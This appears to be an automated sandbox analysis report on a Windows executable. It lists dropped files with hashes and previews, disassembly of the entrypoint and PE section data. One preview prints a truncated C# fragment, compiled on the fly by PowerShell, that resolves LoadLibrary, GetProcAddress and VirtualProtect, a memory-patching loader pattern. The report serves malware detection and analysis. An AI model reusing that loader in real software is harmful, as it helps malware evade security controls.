                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmidzdyt.jh2.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmdqm0ov.0gd.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jugoohmy.mwd.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmnoycgx.i1z.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krdxw4go.mcu.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljjuvolz.abr.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqa0uxpg.sk3.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skias5d2.5v4.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vropu5wq.d3a.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zk05hjf1.45m.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP

                                                                                                Download File
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                File Type:MSVC .res
                                                                                                Category:dropped
                                                                                                Size (bytes):652
                                                                                                Entropy (8bit):3.095901299784415
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuqak7YnqqFbPN5Dlq5J:+RI+ycuZhNXakSJPNnqX
                                                                                                MD5:B91993B05C32742A04B436807A8F9568
                                                                                                SHA1:1C90F767526FD804439E3514054E4DCA251C1F1E
                                                                                                SHA-256:7F87B674D5A79C3A32B569647A496B65404E7BD3471A8D0F6F0E3268BBE8F098
                                                                                                SHA-512:AF0F2D7D441B5A8BB3182EA10FAD8709A07072E8426192FCFA14A27DCE748A94AE0365226BF4E14C4D44E9F278E8B41E68FA175D13CABDEB638A0C9B8AC3F079
                                                                                                Malicious:false
                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.t.u.f.s.o.2.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.t.u.f.s.o.2.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.0.cs

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:Unicode text, UTF-8 (with BOM) text
                                                                                                Category:dropped
                                                                                                Size (bytes):1140
                                                                                                Entropy (8bit):4.751587839856729
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JjajwGHNw7+qFhL/+PS+oXG4mnF1D7ZTHtws4bx:JjaEGHNw7+Ib+6+oXZIF17Zrtws4bx
                                                                                                MD5:FE35992F552A2057291C867108A5C2EB
                                                                                                SHA1:3359CC35D11E68B353BBF06D03F1A9937E2689EE
                                                                                                SHA-256:C6CD29B3B2981C29538DEB9B4445A10EC4993E93F058621F49E6AE294B4B6D1F
                                                                                                SHA-512:8E639DB3A4696FFD380C495CF816B2571656D51AEA0B3DA75FBFC7151F1DE704FE1508FF61C95FC2AC2EF230FD6FEE48536C074D71F025675103B737128E9DFF
                                                                                                Malicious:false
                                                                                                Preview:.using System;.using System.Runtime.InteropServices;..public class MyUtilityClass {. // Renamed class for clarity.. // Additional variables. private const string Kernel32Library = "kernel32";. . // Function declarations. [DllImport(Kernel32Library)]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);.. [DllImport(Kernel32Library)]. public static extern IntPtr LoadLibrary(string name);.. [DllImport(Kernel32Library)]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. // Additional method for clarity. public static IntPtr LoadLibraryAndGetProcAddress(string libraryName, string procName) {. IntPtr hModule = LoadLibrary(libraryName);. if (hModule == IntPtr.Zero) {. throw new Exception("Failed to load library: " + libraryName);. }.. IntPtr procAddress = GetProcAddress(hModule, procName);. if (procAddress == In

                                                                                                C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):369
                                                                                                Entropy (8bit):5.2320134523931925
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fwNXNiX/Gzxs7+AEszIWXp+N23fwC:p37Lvkmb6KHOXgX/GWZE8OXgX/b
                                                                                                MD5:B082657B0246E9F5E257146A9B4FF58D
                                                                                                SHA1:B86B43A54C0112D06D14649F9D7541AB38389F22
                                                                                                SHA-256:C1FBAAEE68645A5B286AD35275D13EB65D3A7D9F58E76DD34E0E43FC3D770F95
                                                                                                SHA-512:9B8F311791830A5DE8EDE940A8E1A6C8116AA0585CC38D30E2793A0A4456756D57270D57AE4B96736D7DDB0D3932D483A9A27E7F0C290B2B7E0F3EF01FA0E508
                                                                                                Malicious:true
                                                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.0.cs"

                                                                                                C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.dll

                                                                                                Download File
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4096
                                                                                                Entropy (8bit):2.981432505280615
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:6lpLNvhfeRPBFLz/kKKhSJbxsUCXumwYvV1ulXa3rq:WJhfeR5dz/dxdsGlK
                                                                                                MD5:1DC4A27F1BB46A455ACAE56CBFF8118C
                                                                                                SHA1:4DDD8FB2D1E0440603B9B4649EECA98CE1F08913
                                                                                                SHA-256:857F3EADBD39BD1E1306BD70033688CFF7B0B0DECB2F8A234EDDD9B1E9F6DF4F
                                                                                                SHA-512:D3E578A6B06266776E50D5ABCDFBBC94DBB444E0ABD61DCF3867FFAA72D0AB9FECB827FCBDD83998B05988ED6A42833F08C6DE1A31D3C30576E513DC33E9A3E8
                                                                                                Malicious:false
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K..g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..M........(......~....(....,.r...p.(....s....z..(......~....(....,.r3..p.(....s....z.*..(....*...BSJB............v4.0.30319......l.......#~..$.......#Strings........x...#US.d.......#GUID...t.......#Blob...........W.........%3........................................................................6./.........5.....U.....|......./...../...../.............................Q.=.......... M............ \.$...

                                                                                                C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.out

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):867
                                                                                                Entropy (8bit):5.307515624971589
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:KBqd3ka6KHOXgX/XE8OXgX/aKax5DqBVKVrdFAMBJTH:Uika6AOXgX/XE8OXgX/aK2DcVKdBJj
                                                                                                MD5:6140CC2078B8B89F7A07BE1C69B92412
                                                                                                SHA1:C327654AB2BAF45F6D4407E444827090C7D1653D
                                                                                                SHA-256:D3D6DCF4080118A13D2DAAFC1E7CC40150EEDB563C5146C82AFAFEDCA0942FA5
                                                                                                SHA-512:C119D8B90CE958EC2AE589FB36030B80A9B55B6FB698E11F99F3C83627525B2F0D4D90E9FC37C10D71BF76B887E84C89F4A392CB86877F9ED2F3590865444C99
                                                                                                Malicious:false
                                                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):1835008
                                                                                                Entropy (8bit):4.327173313518775
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:1RJufhX4RxLT+yHH4A0WBIIQfTa765q/E5ySvL+ML61YhcRo5d5OWiBeRp:3J33BIdBvL+SLcIdYFkp
                                                                                                MD5:615718E393B55AE46400BDC27334331B
                                                                                                SHA1:127861CD7AF8B31D307476845BB876FD1E7EF699
                                                                                                SHA-256:0BCACFBD3DA38DA28A39421DC5BC09EABEA071DFEB0DF36CD0D8934C5E3109F9
                                                                                                SHA-512:80A36BCEEB3C1CD0813E1588D47020175BF28EA1EBE3EDB8ACCBA4E830B2EBD0107C6FD8C7E1D7010722F515CF6BF2394314299FC64611C0523748BFCC9542C0
                                                                                                Malicious:false
                                                                                                Preview:regfO...O....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv....................................................................................................................................................................................................................................................................................................................................................5..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):6.47551582330274
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:Lm9IJ4r9oO.exe
                                                                                                File size:199'168 bytes
                                                                                                MD5:032bc4fb50a2d4fc55727d99248b29b2
                                                                                                SHA1:c517bf569347599fe848c3fc9381f6daf3f9ec71
                                                                                                SHA256:23ce79edb738b3e6dfad9f4dff2ff1800c8f3ccd3b3e809d4dd95c8b3ecfe5dc
                                                                                                SHA512:15efa474c507630647f80a9475a32b7e5a5d32c74b1e512c5a7adc1a5ab361a14f981ed738448c28cd6b98d68806c35c7995066a535d8ae756fe616379df3f54
                                                                                                SSDEEP:6144:fuSgACIp4rAaEHcgjE0iDIgycaA1i5yMoz:fr4rAaE8gvxA1igMoz
                                                                                                TLSH:3B146C11B5C08032D5B315310AF4DBBA9A3EB9714FA669CFA7941F7F8F302C1A63195A
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......44\GpU2.pU2.pU2.;-1.{U2.;-7..U2.;-6.eU2.v.6.bU2.v.1.eU2.v.7.=U2.;-3.wU2.pU3..U2...;.qU2.....qU2...0.qU2.RichpU2................

                                                                                                File Icon

                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x40853c
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x66C7E48C [Fri Aug 23 01:23:24 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:6
                                                                                                OS Version Minor:0
                                                                                                File Version Major:6
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:6
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:3e85697c6fd69fc95de9b2eb31ec533f

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                call 00007F2D7D04447Bh
                                                                                                jmp 00007F2D7D043ADFh
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                push esi
                                                                                                mov ecx, dword ptr [eax+3Ch]
                                                                                                add ecx, eax
                                                                                                movzx eax, word ptr [ecx+14h]
                                                                                                lea edx, dword ptr [ecx+18h]
                                                                                                add edx, eax
                                                                                                movzx eax, word ptr [ecx+06h]
                                                                                                imul esi, eax, 28h
                                                                                                add esi, edx
                                                                                                cmp edx, esi
                                                                                                je 00007F2D7D043C7Bh
                                                                                                mov ecx, dword ptr [ebp+0Ch]
                                                                                                cmp ecx, dword ptr [edx+0Ch]
                                                                                                jc 00007F2D7D043C6Ch
                                                                                                mov eax, dword ptr [edx+08h]
                                                                                                add eax, dword ptr [edx+0Ch]
                                                                                                cmp ecx, eax
                                                                                                jc 00007F2D7D043C6Eh
                                                                                                add edx, 28h
                                                                                                cmp edx, esi
                                                                                                jne 00007F2D7D043C4Ch
                                                                                                xor eax, eax
                                                                                                pop esi
                                                                                                pop ebp
                                                                                                ret
                                                                                                mov eax, edx
                                                                                                jmp 00007F2D7D043C5Bh
                                                                                                push esi
                                                                                                call 00007F2D7D04477Ah
                                                                                                test eax, eax
                                                                                                je 00007F2D7D043C82h
                                                                                                mov eax, dword ptr fs:[00000018h]
                                                                                                mov esi, 00430224h
                                                                                                mov edx, dword ptr [eax+04h]
                                                                                                jmp 00007F2D7D043C66h
                                                                                                cmp edx, eax
                                                                                                je 00007F2D7D043C72h
                                                                                                xor eax, eax
                                                                                                mov ecx, edx
                                                                                                lock cmpxchg dword ptr [esi], ecx
                                                                                                test eax, eax
                                                                                                jne 00007F2D7D043C52h
                                                                                                xor al, al
                                                                                                pop esi
                                                                                                ret
                                                                                                mov al, 01h
                                                                                                pop esi
                                                                                                ret
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                cmp dword ptr [ebp+08h], 00000000h
                                                                                                jne 00007F2D7D043C69h
                                                                                                mov byte ptr [00430228h], 00000001h
                                                                                                call 00007F2D7D043F20h
                                                                                                call 00007F2D7D046D0Dh
                                                                                                test al, al
                                                                                                jne 00007F2D7D043C66h
                                                                                                xor al, al
                                                                                                pop ebp
                                                                                                ret
                                                                                                call 00007F2D7D04F5E9h
                                                                                                test al, al
                                                                                                jne 00007F2D7D043C6Ch
                                                                                                push 00000000h
                                                                                                call 00007F2D7D046D14h
                                                                                                pop ecx
                                                                                                jmp 00007F2D7D043C4Bh
                                                                                                mov al, 01h
                                                                                                pop ebp
                                                                                                ret
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                cmp byte ptr [00430229h], 00000000h
                                                                                                je 00007F2D7D043C66h
                                                                                                mov al, 01h

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2e0300x50.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x310000x1e0.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000x1c04.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x2bda00x70.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2bce00x40.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x240000x158.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x22c060x22e001e7ae8beadcdaa526a94f093e328e4eeFalse0.5663922491039427data6.6099261098449125IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x240000xa7ee0xa800b64ff58716f526d5bf0a7dcff319f4e0False0.43884858630952384data4.981244710793286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0x2f0000x1d580x10007f3d3ebd34c5f43091a6557e2f762199False0.19482421875DOS executable (block device driver \377\377\377\377,32-bit sector-support)3.0558852191755506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rsrc0x310000x1e00x200ad7b78e84f1d02fc883315380c423021False0.529296875data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x320000x1c040x1e0016ce41d4f042a647a389b0421163eb29False0.7002604166666667data6.34754632370132IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_MANIFEST0x310600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                Imports

                                                                                                DLLImport
